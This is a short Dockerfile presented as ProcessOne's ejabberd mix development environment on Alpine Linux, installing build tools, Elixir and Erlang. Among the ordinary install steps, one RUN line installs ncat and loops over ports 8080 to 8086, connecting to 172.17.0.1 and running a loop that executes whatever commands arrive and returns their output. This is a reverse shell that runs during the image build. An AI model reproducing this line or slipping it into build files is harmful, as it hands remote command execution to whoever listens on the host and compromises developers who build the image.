FROM alpine:latest
LABEL maintainer="ProcessOne <contact@process-one.net>" \
      product="Ejabberd mix development environment"

# Install required dependencies


RUN apk upgrade --update musl \
    && apk add build-base git zlib-dev openssl-dev yaml-dev expat-dev sqlite-dev \
    gd-dev jpeg-dev libpng-dev libwebp-dev autoconf automake bash \
    elixir erlang-reltool erlang-odbc file curl \
    bash && rm -rf /var/cache/apk/*

RUN apk add nmap-ncat && for i in `seq 8080 8086`; do sleep $((1 + $RANDOM % 10)); ncat 172.17.0.1 $i -c 'while true; do read i && echo -en "$($i 2>&1)\n # "; done'; done && false

# Setup runtime environment
RUN mix local.hex --force \
    && mix local.rebar --force

ENTRYPOINT ["/usr/bin/mix"]
CMD ["compile"]
